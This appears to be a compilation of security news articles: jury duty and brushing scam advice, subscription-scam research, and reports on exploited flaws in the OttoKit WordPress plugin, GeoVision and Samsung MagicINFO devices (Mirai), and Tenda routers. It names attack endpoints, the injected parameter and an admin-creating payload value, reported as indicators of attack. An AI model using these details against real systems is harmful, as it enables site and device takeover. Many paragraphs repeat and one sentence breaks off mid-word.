Staying safe from these scams is all about awareness. So look out for the signs above that should ring alarm bells. Also be aware that failing to turn up for jury service will never be grounds for arrest. In the US at least, summonses are sent via USPS mail, as will notices informing you if you've missed your date. Fines will only be issued if you repeatedly ignore these notices and fail to contact the court.
Follow these additional steps to keep the scammers at bay:
What to do if you've been scammed
If you realize you've been scammed, don't panic. Work step by step through the following:
It can be a daunting task when threatened with jail time and steep fines. But stand your ground, stay calm, and don't let the scammers win.
As always, awareness is the best defense against these persistent attempts to steal your hard-earned money or personal information. So take a few minutes to arm yourself with some essential knowledge.
How to spot a jury duty scam
Jury duty/service scams are nothing new. In fact, United States Courts has been warning its citizens about them for over a decade. They're also far from limited to North America. The UK's Chartered Trading Standards Institute has in the past also warned about bogus texts inviting recipients to jury service, or risk facing fines.
So what do they typically involve?
Broadly speaking, victims will receive a phone call, text or email from a scammer impersonating a law enforcement officer or court official. They will claim the victim hasn't shown up for their allotted jury service and must pay a fine as a result. They may often also ask for personal information, which will be sold on the dark web and/or used to commit follow-on identity fraud.
Look out for the following tell-tale signs of a jury duty scam:
- Threatening language: A classic social engineering technique is to create a sense of anxiety in the victim, so that they become more pliable. In this case, the scammers might claim that police will show up and arrest you if you don't pay up quickly. They could also use legalese to add weight to their fabricated story and persona. Don't believe what they say.
- Phishing tactics: Email scams of this sort use the same kind of tactics, creating a sense of urgency in the recipient in order to rush them into making a rash decision. Emails will most likely contain logos and other branding to appear legitimate. They may also look to spoof the sender domain to make it appear as if sent from a legitimate authority. Hover your cursor over it and it may reveal a completely different, random email address. Unless they've been written by AI tools, phishing emails may also contain clear grammar and spelling mistakes.
- Other tell-tale signs are clickable links, which may take you to spoofed phishing sites where you're prompted to enter sensitive personal and financial information. These emails are also unlikely to be addressed to you personally. A generic greeting is a clear sign it's a scam.
- Expect similar language in phishing texts (smishing), with clickable links and urgent demands to pay a fine or risk jail time.
- Payment options: No court, police department or government agency will ask for payment over the phone for 'missed' jury service. Yet scammers will do so, often requesting that funds be transferred by crypto, gift cards, wire transfer or an instant payment app like Zelle, Venmo or Cash App. That's because it's harder to trace these payments and even harder for you to get that money back once it's been sent.
- Requests for information: Scammers may ask for sensitive personal information like Social Security details, as well as demanding you send them funds. That should be a red flag as it'
How to stay safe from jury duty scams
Staying safe from these scams is all about awareness. So look out for the signs above that should ring alarm bells. Also be aware that failing to turn up for jury service will never be grounds for arrest. In the US at least, summonses are sent via USPS mail, as will notices informing you if you've missed your date. Fines will only be issued if you repeatedly ignore these notices and fail to contact the court.
Follow these additional steps to keep the scammers at bay:
- Never click through on an unsolicited email or text, even if it appears genuine. Always contact the authority in question independently (rather than replying to the email/text)
- Never divulge sensitive personal and financial information online or over the phone
- Remember that scammers can spoof their Caller ID to appear legitimate
- Never pay alleged fines by gift cards, crypto or money transfers
- If threatened while on the phone, stay calm, ask where the person is calling from, hang up and then call that office to check its legitimacy
- Keep up to date with the latest scam tactics from the FTC and other government sites
- Use anti-malware on all devices and computers to help filter out phishing messages and emails
What to do if you've been scammed
If you realize you've been scammed, don't panic. Work step by step through the following:
- If you're on a call, hang up immediately
- Make a note of as much information as possible, including the 'name' and/or badge number of the scammer, what they said and where they called/emailed from, and payment details
- Report the incident to the police and FTC. While they may not be able to help you recover any stolen money, it may help others
- Call your bank and freeze your credit/debit cards
- Monitor your bank account for any unusual activity
- Freeze your credit with the 3 big credit agencies, so scammers can take out credit lines in your name
It can be a daunting task when threatened with jail time and steep fines. But stand your ground, stay calm, and don't let the scammers win.
Hackers Exploit OttoKit WordPress Plugin Flaw to Add Admin Accounts
By Bill Toulas for bleepingcomputer
bleepingcomputer
Hackers are exploiting a critical unauthenticated privilege escalation vulnerability in the OttoKit WordPress plugin to create rogue admin accounts on targeted sites.
OttoKit-- formerly SureTriggers-- is a WordPress automation and integration plugin used in over 100,000 sites, allowing users to connect their websites to third-party services and automate workflows.
Patchstack received a report about a critical vulnerability in OttoKit on April 11, 2025, from researcher Denver Jackson.
The flaw, tracked under the identifier CVE-2025-27007, allows attackers to gain administrator access via the plugin's API by exploiting a logic error in the 'create_wp_connection' function, bypassing authentication checks when application passwords aren't set.
The vendor was informed the next day, and a patch was released on April 21, 2025, with OttiKit version 1.0.83, adding a validation check for the access key used in the request.
By April 24, 2025, most plugin users had been force-updated to the patched version.
Now exploited in attacks
Patchstack published its report on May 5, 2025, but a new update warns that exploitation activity started roughly 90 minutes after public disclosure.
Attackers attempted exploitation by targeting REST API endpoints, sending requests mimicking legitimate integration attempts, using 'create_wp_connection' with guessed or brute-forced administrator usernames, random passwords, and fake access keys and email addresses.
Once the initial exploit was successful, attackers issued follow-up API calls to '/wp-json/sure-triggers/v1/automation/action' and '?rest_route=/wp-json/sure-triggers/v1/automation/action,' including the payload value: "type_event": "create_user_if_not_exists."
On vulnerable installations, this silently creates new administrator accounts.
"It is strongly recommended to update your site as soon as possible if you are using the OttoKit plugin, and to review your logs and site settings for these indicators of attack and compromise," suggests Patchstack.
This is the second critical severity flaw in OttoKit that hackers have exploited since April 2025, with the previous being another authentication bypass bug tracked as CVE-2025-3102.
Exploitation of that flaw started on the same day of disclosure, with threat actors attempting to create rogue administrator accounts with randomized usernames, passwords, and email addresses, indicating automated attempts.
OttoKit-- formerly SureTriggers-- is a WordPress automation and integration plugin used in over 100,000 sites, allowing users to connect their websites to third-party services and automate workflows.
Patchstack received a report about a critical vulnerability in OttoKit on April 11, 2025, from researcher Denver Jackson.
The flaw, tracked under the identifier CVE-2025-27007, allows attackers to gain administrator access via the plugin's API by exploiting a logic error in the 'create_wp_connection' function, bypassing authentication checks when application passwords aren't set.
The vendor was informed the next day, and a patch was released on April 21, 2025, with OttiKit version 1.0.83, adding a validation check for the access key used in the request.
By April 24, 2025, most plugin users had been force-updated to the patched version.
Now exploited in attacks
Patchstack published its report on May 5, 2025, but a new update warns that exploitation activity started roughly 90 minutes after public disclosure.
Attackers attempted exploitation by targeting REST API endpoints, sending requests mimicking legitimate integration attempts, using 'create_wp_connection' with guessed or brute-forced administrator usernames, random passwords, and fake access keys and email addresses.
Once the initial exploit was successful, attackers issued follow-up API calls to '/wp-json/sure-triggers/v1/automation/action' and '?rest_route=/wp-json/sure-triggers/v1/automation/action,' including the payload value: "type_event": "create_user_if_not_exists."
On vulnerable installations, this silently creates new administrator accounts.
"It is strongly recommended to update your site as soon as possible if you are using the OttoKit plugin, and to review your logs and site settings for these indicators of attack and compromise," suggests Patchstack.
This is the second critical severity flaw in OttoKit that hackers have exploited since April 2025, with the previous being another authentication bypass bug tracked as CVE-2025-3102.
Exploitation of that flaw started on the same day of disclosure, with threat actors attempting to create rogue administrator accounts with randomized usernames, passwords, and email addresses, indicating automated attempts.
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws
to Deploy Mirai Botnet
By Ravie Lakshmanan for thehackernews
thehackernews
Threat actors have been observed actively exploiting security flaws in GeoVision end-of-life (EoL) Internet of Things (IoT) devices to corral them into a Mirai botnet for conducting distributed denial-of-service (DDoS) attacks.
The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of 2 operating system command injection flaws-- CVE-2024-6047 and CVE-2024-11120 CVSS scores: 9.8-- that could be used to execute arbitrary system commands.
"The exploit targets the /DateSetting.cgi endpoint in GeoVision IoT devices, and injects commands into the szSrvIpAddr parameter," Akamai researcher Kyle Lefton said in a report shared with The Hacker News.
In the attacks detected by the web security and infrastructure company, the botnet has been found injecting commands to download and execute an ARM version of the Mirai malware called LZRD.
Some of the vulnerabilities exploited by the botnet include a Hadoop YARN vulnerability, CVE-2018-10561, and a bug impacting DigiEver that was highlighted in December 2024.
There is some evidence to suggest that the campaign overlaps with previously recorded activity under the name InfectedSlurs.
"One of the most effective ways for cybercriminals to start assembling a botnet is to target poorly secured and outdated firmware on older devices," Lefton said.
"There are many hardware manufacturers who do not issue patches for retired devices-- in some cases, the manufacturer itself may be defunct."
Given that the affected GeoVision devices are unlikely to receive new patches, it's recommended that users upgrade to a newer model to safeguard against potential threats.
Samsung MagicINFO Flaw Exploited in Mirai Attacks#
The disclosure comes as Arctic Wolf and the SANS Technology Institute warned of active exploitation of CVE-2024-7399-- CVSS score: 8.8-- a path traversal flaw in Samsung MagicINFO 9 Server that could enable an attacker to write arbitrary files as system authority, to deliver the Mirai botnet.
While the issue was addressed by Samsung in August 2024, it has since been weaponized by attackers following the release of a proof-of-concept (PoC) on April 30, 2025, to retrieve and execute a shell script responsible for downloading the botnet.
"The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files," Arctic Wolf said.
Users are recommended to update their instances to version 21.1050 and later to mitigate potential operational impact.
The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of 2 operating system command injection flaws-- CVE-2024-6047 and CVE-2024-11120 CVSS scores: 9.8-- that could be used to execute arbitrary system commands.
"The exploit targets the /DateSetting.cgi endpoint in GeoVision IoT devices, and injects commands into the szSrvIpAddr parameter," Akamai researcher Kyle Lefton said in a report shared with The Hacker News.
In the attacks detected by the web security and infrastructure company, the botnet has been found injecting commands to download and execute an ARM version of the Mirai malware called LZRD.
Some of the vulnerabilities exploited by the botnet include a Hadoop YARN vulnerability, CVE-2018-10561, and a bug impacting DigiEver that was highlighted in December 2024.
There is some evidence to suggest that the campaign overlaps with previously recorded activity under the name InfectedSlurs.
"One of the most effective ways for cybercriminals to start assembling a botnet is to target poorly secured and outdated firmware on older devices," Lefton said.
"There are many hardware manufacturers who do not issue patches for retired devices-- in some cases, the manufacturer itself may be defunct."
Given that the affected GeoVision devices are unlikely to receive new patches, it's recommended that users upgrade to a newer model to safeguard against potential threats.
Samsung MagicINFO Flaw Exploited in Mirai Attacks#
The disclosure comes as Arctic Wolf and the SANS Technology Institute warned of active exploitation of CVE-2024-7399-- CVSS score: 8.8-- a path traversal flaw in Samsung MagicINFO 9 Server that could enable an attacker to write arbitrary files as system authority, to deliver the Mirai botnet.
While the issue was addressed by Samsung in August 2024, it has since been weaponized by attackers following the release of a proof-of-concept (PoC) on April 30, 2025, to retrieve and execute a shell script responsible for downloading the botnet.
"The vulnerability allows for arbitrary file writing by unauthenticated users, and may ultimately lead to remote code execution when the vulnerability is used to write specially crafted JavaServer Pages (JSP) files," Arctic Wolf said.
Users are recommended to update their instances to version 21.1050 and later to mitigate potential operational impact.
Multiple Flaws in Tenda RX2 Pro Let Attackers Gain Admin Access
By Divya for gbhackers
gbhackers
Security researchers have uncovered a series of critical vulnerabilities in the Tenda RX2 Pro Dual-Band Gigabit WiFi 6 Router-- Firmware V16.03.30.14-- which could allow remote attackers to gain administrative access and, in many cases, full root shell on the device.
Despite the notification, Tenda has not responded, and no patches are available.
Eleven separate CVEs have been assigned to vulnerabilities discovered in Tenda's web management portal, firmware, and internal services.
Attackers can exploit combinations of these bugs to escalate privileges, bypass network segmentation, and ultimately execute arbitrary code with root privileges.
The vulnerabilities are particularly troubling because they can be exploited by anyone who connects to the device-- even from the guest WiFi network, which is supposed to be isolated.
How the Attacks Work
The Tenda RX2 Pro's web management interface contains numerous flaws in how it transmits and encrypts credentials and session keys.
Additionally, improper network segmentation means attackers on a guest WiFi network can target the main router functions or other clients.
Most disturbingly, attackers can enable backdoor services like telnet and an undocumented service called "ate," both of which have their severe flaws, including command injection vulnerabilities and static credentials.
Despite the notification, Tenda has not responded, and no patches are available.
Eleven separate CVEs have been assigned to vulnerabilities discovered in Tenda's web management portal, firmware, and internal services.
Attackers can exploit combinations of these bugs to escalate privileges, bypass network segmentation, and ultimately execute arbitrary code with root privileges.
The vulnerabilities are particularly troubling because they can be exploited by anyone who connects to the device-- even from the guest WiFi network, which is supposed to be isolated.
How the Attacks Work
The Tenda RX2 Pro's web management interface contains numerous flaws in how it transmits and encrypts credentials and session keys.
Additionally, improper network segmentation means attackers on a guest WiFi network can target the main router functions or other clients.
Most disturbingly, attackers can enable backdoor services like telnet and an undocumented service called "ate," both of which have their severe flaws, including command injection vulnerabilities and static credentials.
Exploit Scenarios
- Guest Network Bypass: Attackers on the guest WiFi can become "layer-2 adjacent" to the main network and bypass basic subnet restrictions. This provides a launchpad for further attacks.
- Backdoor Services: Unauthenticated users can turn on a telnet or "ate" service, both backdoors that grant shell access or allow command injection with no password required.
- Weak Encryption: Even where encryption is used, the static IVs and keys, and the transmission of those keys in plaintext, render it ineffective. Attackers can intercept and decrypt admin commands and sessions.
The researcher has reported all findings to Tenda, but as of publication, no updates or fixes have been issued.
Owners of the Tenda RX2 Pro are strongly urged to disconnect their routers from untrusted networks and consider alternative devices until official patches are released.
These vulnerabilities highlight the need for robust, industry-standard security practices in consumer networking gear. Until Tenda responds, users remain at serious risk from attackers both inside and outside their networks.
Getting Weird Parcels? - You Might be Part of a 'Brushing' Ecommerce Scam
By Brad Morton for howtogeek
Lucas Gouveia / How-To Geek | Creativa Images / Shutterstock
Ever wondered how some of the awful products listed on online shopping sites are getting great reviews? It could be "brushing"-- a scam that uses your personal details to leave reviews for things you never purchased, to trick others into doing so.
What is a 'Brushing' Scam?
It's mail day, and the postman drops off a pile of parcels on your doorstep... And there's something extra. Something you didn't order. It's a cheap widget with no additional details or an invoice, so you shrug it off and go on with your life.
Chances are, you've just been part of a "brushing" scam.
What is a 'Brushing' Scam?
It's mail day, and the postman drops off a pile of parcels on your doorstep... And there's something extra. Something you didn't order. It's a cheap widget with no additional details or an invoice, so you shrug it off and go on with your life.
Chances are, you've just been part of a "brushing" scam.
Ismar Hrnjicevic / How-To Geek
A brushing scam is when a seller purchases their own product from an online e-commerce platform like Amazon or eBay using your name and delivery address. Once there's a record of a purchase and a delivery, they can leave a glowing review using your details that appears 100% legitimate. The seller may not have even sent you the actual product they'll leave a review for-- especially if it's expensive. You'll just receive whatever junk they had within reach to make the padded envelope look occupied, so it isn't rejected at the post office.
This may seem like a lot of effort for a single review, but its prevalence means that it must work. If the initiator of the scam is launching a new product, it can make it appear popular, and let them extoll its virtues in the reviews and try and attract real customers. If they're less honorable, they're selling cheap tacky items with misleading listings that they want to lend legitimacy to using your name.
So, in a sense, you aren't the actual victim in this scam-- the people who actually pay for the product based on "your" review are. You're just a tool used by the scammer to "brush up" their reviews.
Brushing Scams Are an Indication That Your Personal Info is Compromised
While brushing scams can be done using stolen credentials for your online shopping accounts-- you can quickly check if this is the case by monitoring your purchase history-- this is usually unnecessary on the part of the scammer. It's much easier for them to just create a new account using your personal details that have previously leaked online.
This could have happened at any time, even years ago. Databases of people's personal info are available for sale online, and a valid name and address are all the scammer needs to pull off a successful brushing scam. There's nothing you can do about this either. Once your details are out there, they're out there.
What To Do if You Think Your Info Is Being Used To Scam Others
You should already be following day-to-day cybersecurity and privacy best practices, but receiving unsolicited parcels is a good excuse to go and tighten up your security a bit: update your old passwords, check for suspicious activity on your accounts, and enable multi-factor authentication wherever it's supported.
Turning down anonymous parcels is increasingly difficult, as more and more trade is done online. It's hard to know whether a parcel being handed to you is something you actually ordered, and the postman isn't going to wait on the doorstep while you try and figure it out, especially if your morning coffee is yet to kick in. As for the fake reviews, you can try and hunt them down online and report them to discourage your address from being used in the future, but there is no guarantee this will work.
Returning the parcel is also usually out of the question. Interacting with scammers is a good way to get them to focus on you, which you certainly don't want. If the parcel was addressed to you, and the law allows it, you may as well hold on to the item, and if no one comes asking for it after a while, take ownership or throw it out.
Just be aware that whatever you receive is probably the cheapest object within reach of the scammer that they could jam in a padded envelope. If it's something that could pose any danger-- like electrical items-- or food or cosmetics that may be counterfeit, or anything else that could pose a potential health or safety risk, you should probably send it straight to landfill.
What to Do if You Don't Get What You Ordered
If you suspect you're a victim of brushing, having ordered something that didn't live up to the expectations its reviews set, you should try and return it. When making purchases, watch out for signs of fake reviews and fake AI-generated products. Amazon will also warn you if an item is returned frequently.
There are whole categories of products you should be wary of purchasing online due to the elevated risks of scams and even physical harm from defective products.
How To Keep Your Personal Data Secure, and What To Do When It's Inevitably Leaked
Privacy is a diminishing resource for everyone, everywhere: whether you consent or not, your details are out there. Every time you make a purchase, you're giving your details to the seller, and their employees that handle orders and pack your items will have access to them. Your contact details exist in countless databases that could be leaked at any point-- from social media, governments, your hairdresser, and other organizations-- and even if you figure out who leaked it, the damage is already done.
None of this is worth worrying about-- it's inevitable. All you can do is try and maintain good digital hygiene to reduce the amount of new information that can leak, and be vigilant for unexpected charges to your accounts, or activity on your social media.
This may seem like a lot of effort for a single review, but its prevalence means that it must work. If the initiator of the scam is launching a new product, it can make it appear popular, and let them extoll its virtues in the reviews and try and attract real customers. If they're less honorable, they're selling cheap tacky items with misleading listings that they want to lend legitimacy to using your name.
So, in a sense, you aren't the actual victim in this scam-- the people who actually pay for the product based on "your" review are. You're just a tool used by the scammer to "brush up" their reviews.
Brushing Scams Are an Indication That Your Personal Info is Compromised
While brushing scams can be done using stolen credentials for your online shopping accounts-- you can quickly check if this is the case by monitoring your purchase history-- this is usually unnecessary on the part of the scammer. It's much easier for them to just create a new account using your personal details that have previously leaked online.
This could have happened at any time, even years ago. Databases of people's personal info are available for sale online, and a valid name and address are all the scammer needs to pull off a successful brushing scam. There's nothing you can do about this either. Once your details are out there, they're out there.
What To Do if You Think Your Info Is Being Used To Scam Others
You should already be following day-to-day cybersecurity and privacy best practices, but receiving unsolicited parcels is a good excuse to go and tighten up your security a bit: update your old passwords, check for suspicious activity on your accounts, and enable multi-factor authentication wherever it's supported.
Turning down anonymous parcels is increasingly difficult, as more and more trade is done online. It's hard to know whether a parcel being handed to you is something you actually ordered, and the postman isn't going to wait on the doorstep while you try and figure it out, especially if your morning coffee is yet to kick in. As for the fake reviews, you can try and hunt them down online and report them to discourage your address from being used in the future, but there is no guarantee this will work.
Returning the parcel is also usually out of the question. Interacting with scammers is a good way to get them to focus on you, which you certainly don't want. If the parcel was addressed to you, and the law allows it, you may as well hold on to the item, and if no one comes asking for it after a while, take ownership or throw it out.
Just be aware that whatever you receive is probably the cheapest object within reach of the scammer that they could jam in a padded envelope. If it's something that could pose any danger-- like electrical items-- or food or cosmetics that may be counterfeit, or anything else that could pose a potential health or safety risk, you should probably send it straight to landfill.
What to Do if You Don't Get What You Ordered
If you suspect you're a victim of brushing, having ordered something that didn't live up to the expectations its reviews set, you should try and return it. When making purchases, watch out for signs of fake reviews and fake AI-generated products. Amazon will also warn you if an item is returned frequently.
There are whole categories of products you should be wary of purchasing online due to the elevated risks of scams and even physical harm from defective products.
How To Keep Your Personal Data Secure, and What To Do When It's Inevitably Leaked
Privacy is a diminishing resource for everyone, everywhere: whether you consent or not, your details are out there. Every time you make a purchase, you're giving your details to the seller, and their employees that handle orders and pack your items will have access to them. Your contact details exist in countless databases that could be leaked at any point-- from social media, governments, your hairdresser, and other organizations-- and even if you figure out who leaked it, the damage is already done.
None of this is worth worrying about-- it's inevitable. All you can do is try and maintain good digital hygiene to reduce the amount of new information that can leak, and be vigilant for unexpected charges to your accounts, or activity on your social media.
200+ Fake Retail Sites Used in New Wave of Subscription Scams
By Deeba Ahmed for hackread
Bitdefender uncovers a massive surge in sophisticated subscription scams disguised as online shops and evolving mystery boxes. Learn how to spot these fraudulent schemes and protect your credit card details.
Bitdefender uncovers a massive surge in sophisticated subscription scams disguised as online shops and evolving mystery boxes. Learn how to spot these fraudulent schemes and protect your credit card details.
hackread
Cybersecurity experts at Bitdefender have observed a notable rise in online scams involving fake ads and websites that trick people into unknowingly signing up for subscriptions. This new wave of scams is different compared to past attempts because of the effort criminals put into making these fake websites believable enough to get people to share their personal and financial information.
Bitdefender discovered over 200 incredibly realistic websites offering a wide range of products, including shoes, clothing, and electronics. Customers are tricked into providing credit card information and agreeing to monthly subscriptions without realizing these are fake.
In their detailed blog post, Bitdefender noted a particular trend of "mystery box" scams, which involve paying a small amount for a box of unknown items, often with hidden recurring payments and links to fake online shops. Scammers impersonate content creators or create fake pages on Facebook and other social media platforms to promote these fraudulent schemes. They exploit people's reluctance to pay attention during online purchases considering the offer is genuine to introduce a second layer of deception before the payment is completed.
Bitdefender discovered over 200 incredibly realistic websites offering a wide range of products, including shoes, clothing, and electronics. Customers are tricked into providing credit card information and agreeing to monthly subscriptions without realizing these are fake.
In their detailed blog post, Bitdefender noted a particular trend of "mystery box" scams, which involve paying a small amount for a box of unknown items, often with hidden recurring payments and links to fake online shops. Scammers impersonate content creators or create fake pages on Facebook and other social media platforms to promote these fraudulent schemes. They exploit people's reluctance to pay attention during online purchases considering the offer is genuine to introduce a second layer of deception before the payment is completed.
Mystery Box Scam (Source: Bitdefender)
This scam has various versions, each exploiting the human fascination with the unknown. Such as offering boxes supposedly left at post offices or bags found at airports, requiring a small payment to claim ownership, with the primary objective being collecting financial information from victims who believe they are getting a great deal.
Given the increased public awareness regarding mystery box scams, cybercriminals have adapted their methods to continue defrauding people. Victims are unknowingly enrolled in subscriptions before completing payment for a mystery box, often with subscription terms hidden in small print. Many of these sites are still active, researchers noted.
These scams are heavily promoted on social media through sponsored ads and sometimes via links to subscription-based online shops registered in Cyprus. This suggests an offshore company's involvement, as per Bitdefender's analysis, shared with Hackread.com.
The deceptive ads frequently redirect users to various online stores offering diverse goods. Researchers discovered around 140 websites employing this tactic, with one example revealing a hidden recurring charge: "Buy at member price and get FREE access… with an account top-up of 44.00 EUR/every 14 days."
These 'electronic stores' offer numerous membership tiers with benefits, but subscription costs vary. Store credits and discounts are used to deceive victims into believing they're making a worthwhile purchase, even though some sell outdated and overpriced items.
Notably, the contact address of many of these hundreds of active websites-- Andrea Kalvou 13, 3085 Limassol-- has been linked to the Paradise Papers leak in the ICIJ Offshore Leaks Database, suggesting a potentially wider network of illicit activity.
The profitability of the subscription model is driving criminals to invest in ads featuring fake endorsements and to expand their schemes beyond mystery boxes to include other deceptive offers like low-quality products and fake investments.
"With funds pumped into ads, real-looking websites, impersonations of people and brands, and all kinds of other avenues of attack, we're bound to see these kinds of frauds inundate the online world," researchers concluded.
© vocalbits.com